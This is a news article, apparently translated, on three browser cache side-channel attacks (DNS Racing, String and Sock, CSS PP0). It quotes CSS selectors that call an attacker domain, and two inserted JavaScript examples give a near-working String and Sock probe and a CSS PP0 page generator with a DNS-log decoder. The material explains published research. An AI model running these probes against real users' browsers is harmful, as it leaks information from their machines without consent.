A CPU cache side-channel attack carried out in a web browser without JavaScript

A team of researchers from several universities in the USA, Israel and Australia has developed three attacks that run inside web browsers and extract information about the contents of the processor cache. One of the methods works in browsers without JavaScript; the other two bypass the existing protections against side-channel attacks, including those used in the Tor Browser and DeterFox. Code demonstrating the attacks, together with the server-side components they require, has been published on GitHub.

To analyse the cache contents, all of the attacks use the Prime+Probe method: the cache is filled with a reference set of values, and changes are detected by measuring the access time when it is filled again. To bypass the browser protections that interfere with accurate time measurement, two of the variants make requests to an attacker-controlled DNS or WebSocket server, which keeps a log of the arrival times of the requests. In the remaining variant, the roughly fixed response time of a DNS lookup is used as the time reference.

Measurements taken through an external DNS or WebSocket server, fed into a machine-learning-based classifier, were sufficient to predict values with up to 98% accuracy in the best case (80-90% on average). The attack methods were tested on several hardware platforms (Intel, AMD Ryzen, Apple M1, Samsung Exynos) and shown to be universal.


The first variant of the attack, DNS Racing, uses a conventional implementation of the Prime+Probe method based on JavaScript arrays. The difference is that it uses an external, DNS-based timer together with an error handler that fires when an attempt to load an image from a non-existent domain fails. The external timer makes a Prime+Probe attack possible in browsers that restrict or completely block access to JavaScript timers.

For a DNS server located on the same Ethernet network, the resolution of this timer is estimated at about 2 ms, which is enough for a side-channel attack (for comparison, the resolution of the standard JavaScript timer in the Tor Browser is reduced to 100 ms). The attack does not require control over the DNS server: the duration of the probe operation is chosen so that the DNS response time becomes an indicator of whether the probe finished earlier or later (depending on whether the error handler fires before or after the probe completes, a conclusion is drawn about how fast the cache probe ran).

The second variant of the attack, "String and Sock", is aimed at bypassing protection techniques that restrict low-level use of arrays in JavaScript. Instead of arrays, String and Sock uses operations on very large strings, whose size is chosen so that the variable covers the entire LLC (last-level cache). The indexOf() function is then used to search the string for a short substring that is deliberately absent from it, so the search operation ends up iterating over the whole string. Since the size of the string matches the size of the LLC, this scan performs the cache-probing step without manipulating arrays. To measure the delay, a request is made to an attacker-controlled WebSocket server instead of DNS: messages are sent over the socket before and after the search operation completes, and the server computes from their arrival times the delay that is used to analyse the cache contents.
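The probe step described above, as an added example in plain JavaScript (this is not code from the paper or from its GitHub repository). The 8 MiB LLC size, the needle, and the offline stand-in clock are assumptions; in the browser the clock would be the WebSocket wrapper shown in makeWebSocketClock, and the delay would be computed by the attacker's server from message arrival times rather than by the page.

```javascript
// Added example, not code from the paper or its repository: the "String and
// Sock" probe step. The LLC size, the needle and the stand-in clock are
// assumptions for illustration.

const LLC_BYTES = 8 * 1024 * 1024; // assumed LLC size (8 MiB)
// JavaScript strings are UTF-16: 2 bytes per code unit, so half as many
// characters as cache bytes are needed for the string to cover the LLC.
const HAYSTACK = 'a'.repeat(LLC_BYTES / 2);
// The needle contains a character that never occurs in the haystack, so
// indexOf() has to read the whole string before it can return -1.
const NEEDLE = 'bbbb';

// In the real attack the clock is a WebSocket to the attacker's server, which
// timestamps each message on arrival; the page never reads a JavaScript timer.
function makeWebSocketClock(ws) {
  return { send(label) { ws.send(label); } };
}

// Offline stand-in: record performance.now() where the server would record
// the arrival time, so the example runs without a network.
function makeStandInClock() {
  const marks = [];
  return { send(label) { marks.push({ label, t: performance.now() }); }, marks };
}

// One probe round: bracket the full-string scan with two marks. The scan
// touches every cache line the string occupies; lines evicted by another
// process since the previous round cost misses, which lengthens the gap.
function probeRound(clock, haystack = HAYSTACK, needle = NEEDLE) {
  clock.send('before');
  const pos = haystack.indexOf(needle);
  clock.send('after');
  return pos;
}

// Server side: turn the arrival log into one delay per round by pairing each
// 'before' mark with the 'after' mark that follows it.
function delaysFromMarks(marks) {
  const delays = [];
  for (let i = 0; i + 1 < marks.length; i++) {
    if (marks[i].label === 'before' && marks[i + 1].label === 'after') {
      delays.push(marks[i + 1].t - marks[i].t);
    }
  }
  return delays;
}

// Run several rounds against the stand-in clock and return the delays (ms).
function collectDelays(rounds) {
  const clock = makeStandInClock();
  for (let i = 0; i < rounds; i++) {
    if (probeRound(clock) !== -1) throw new Error('needle must be absent');
  }
  return delaysFromMarks(clock.marks);
}

console.log('probe delays (ms):', collectDelays(5).map((d) => d.toFixed(3)));
```

The numbers printed by the stand-in clock are only meaningful relative to each other: what the classifier in the paper works on is the variation between rounds, not the absolute scan time.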

The third variant of the attack, "CSS PP0", is implemented with HTML and CSS alone and can work in browsers with JavaScript disabled. The method resembles "String and Sock" but is not tied to JavaScript. During the attack, a set of CSS selectors is generated that match on a substring mask. The large reference string that fills the cache is created as a div tag with a very long class name. Inside it is a set of further divs, each with its own identifier. Each of these nested divs has its own style rule whose selector searches the long class name for a short substring. When rendering the page, the browser starts by processing the nested divs, which causes a search operation over the large string. The search uses a mask that is deliberately absent, so it iterates over the whole string, after which the "not" condition triggers an attempt to load a background image from a random subdomain:

#pp:not([class*='xjtoxg']) #s0 {background-image: url("https://qdlvibmr.helldomain.oy.ne.ro");}
#pp:not([class*='gzstxf']) #s1 {background-image: url("https://licfsdju.helldomain.oy.ne.ro");}
…

The attacker's DNS server is authoritative for the subdomain, so it can measure the delay between incoming requests. It returns NXDOMAIN for every request and keeps a precise log of request arrival times. As the set of divs is processed, the attacker's DNS server receives a sequence of requests whose inter-arrival delays correlate with the result of probing the cache contents.
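The page generation and the server-side decoding described in the two paragraphs above, as an added example in JavaScript (Node) that is not the paper's or the repository's code. The attacker zone helldomain.example, the slot count, the 8 MiB class-name size, the xorshift label generator, and the sample DNS log are assumptions; the log is constructed, not a real capture.

```javascript
// Added example, not code from the paper or its repository: build a CSS PP0
// page and decode the timing from the attacker's DNS log. The domain, the
// number of probe slots, the class-name size and the sample log are
// assumptions for illustration.

const ATTACK_DOMAIN = 'helldomain.example'; // assumed attacker-controlled zone
const LLC_BYTES = 8 * 1024 * 1024;          // assumed LLC size (8 MiB)

// Deterministic xorshift32 so the generated page is reproducible here; a real
// attack would use fresh random labels on every page load.
function makeRng(seed) {
  let s = (seed >>> 0) || 1;
  return () => {
    s ^= s << 13; s >>>= 0;
    s ^= s >>> 17;
    s ^= s << 5; s >>>= 0;
    return s;
  };
}

// Labels are drawn from b..z only, so a mask can never occur inside the
// cache-filling class name, which consists solely of the letter 'a'.
function randomLabel(rng, len) {
  let out = '';
  for (let i = 0; i < len; i++) out += String.fromCharCode(98 + (rng() % 25));
  return out;
}

// Build the attack page: one outer div whose class attribute is the
// cache-filling string, and n nested divs. Each nested div gets a rule that
// scans the long class name for a label that is never present; the :not()
// then matches and the background-image URL produces one DNS query per slot.
function buildCssPp0Page(n, { domain = ATTACK_DOMAIN, classBytes = LLC_BYTES, seed = 1 } = {}) {
  const rng = makeRng(seed);
  const fill = 'a'.repeat(classBytes);
  const rules = [];
  const slots = [];
  for (let i = 0; i < n; i++) {
    const mask = randomLabel(rng, 6);
    const host = `${randomLabel(rng, 8)}.${domain}`;
    slots.push({ id: `s${i}`, mask, host });
    rules.push(`#pp:not([class*='${mask}']) #s${i} {background-image: url(https://${host});}`);
  }
  const body = slots.map((s) => `<div id="${s.id}"></div>`).join('');
  const html =
    `<!doctype html><html><head><style>\n${rules.join('\n')}\n</style></head>` +
    `<body><div id="pp" class="${fill}">${body}</div></body></html>`;
  return { html, slots };
}

// Server side: the attacker's resolver answers NXDOMAIN and logs the arrival
// time of every query. Pair the hosts in slot order with their first arrival
// and return the delay since the previous slot's query; a larger gap before
// slot i means the browser spent longer scanning for selector i's mask.
// A slot whose query never arrived (lost, or answered from a cache) yields
// null, and the next slot's delay then spans both scans.
function delaysFromDnsLog(slots, log) {
  const arrival = new Map();
  for (const { t, qname } of log) {
    const name = qname.toLowerCase().replace(/\.$/, '');
    if (!arrival.has(name)) arrival.set(name, t); // keep first query, ignore retries
  }
  const delays = [];
  let prev = null;
  for (const s of slots) {
    const t = arrival.get(s.host);
    if (t === undefined) { delays.push(null); continue; }
    delays.push(prev === null ? 0 : t - prev);
    prev = t;
  }
  return delays;
}

// Constructed sample log (not a real capture): queries 2 ms apart, an
// unrelated query in between, then a 9 ms gap before the last slot.
const PAGE = buildCssPp0Page(4);
const SAMPLE_LOG = [
  { t: 100.0, qname: PAGE.slots[0].host },
  { t: 102.0, qname: PAGE.slots[1].host + '.' },
  { t: 104.0, qname: PAGE.slots[2].host },
  { t: 104.5, qname: 'unrelated.example' },
  { t: 113.0, qname: PAGE.slots[3].host.toUpperCase() },
];

console.log('per-slot delays (ms):', delaysFromDnsLog(PAGE.slots, SAMPLE_LOG));
```

The generated rules have the same shape as the selectors quoted above; the only difference is that the zone and the labels are the example's own. The decoder deliberately keys on the first query per host, since resolvers retry lost queries and a retry would otherwise look like a long scan.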

source: budenet.ru